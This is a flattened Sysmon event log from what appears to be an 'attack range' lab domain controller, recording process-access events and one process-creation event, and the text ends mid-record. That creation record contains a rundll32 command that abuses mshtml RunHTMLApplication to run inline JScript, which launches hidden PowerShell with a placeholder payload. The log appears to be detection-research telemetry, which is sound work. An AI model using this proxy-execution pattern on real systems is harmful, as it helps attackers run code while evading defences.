10341000x800000000000000026684Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.350{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-536A-6008-6B06-00000000A301}5244C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026683Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.350{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-536A-6008-6B06-00000000A301}5244C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026682Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.350{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-536A-6008-6B06-00000000A301}5244C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026681Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.350{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-536A-6008-6B06-00000000A301}5244C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026680Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.334{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-536A-6008-6B06-00000000A301}5244C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026679Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.334{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-536A-6008-6B06-00000000A301}5244C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026678Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.334{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-536A-6008-6B06-00000000A301}5244C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026677Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.334{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-536A-6008-6B06-00000000A301}5244C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026676Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.334{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-536A-6008-6B06-00000000A301}5244C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026675Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.319{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-536A-6008-6B06-00000000A301}5244C:\Windows\System32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026674Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.319{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-536A-6008-6B06-00000000A301}5244C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026673Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.303{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-536A-6008-6B06-00000000A301}5244C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000026672Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.303{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026671Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.303{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026670Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.303{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026669Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.303{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026668Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.303{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-536A-6008-6B06-00000000A301}5244C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000026667Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536A-6008-6B06-00000000A301}5244C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000026666Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.309{7901BC46-536A-6008-6B06-00000000A301}5244C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXE"C:\Windows\System32\rundll32.exe" about:"\..\mshtml,RunHTMLApplication "%%3Chta:application%%3E%%3Cscript%%20language="JScript"%%3Ea=new%%20ActiveXObject("WScript.Shell");a.Run("powershell.exe%%20-nop%%20-Command%%20Write-Host%%20aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa;%%20Start-Sleep%%20-Seconds%%202;%%20exit",0,true);close();%%3C/script%%3EC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000026665Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5369-6008-6A06-00000000A301}6204C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026664Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5369-6008-6906-00000000A301}5376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026663Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5368-6008-6806-00000000A301}3256C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026662Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026661Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026660Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026659Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:38.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026658Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 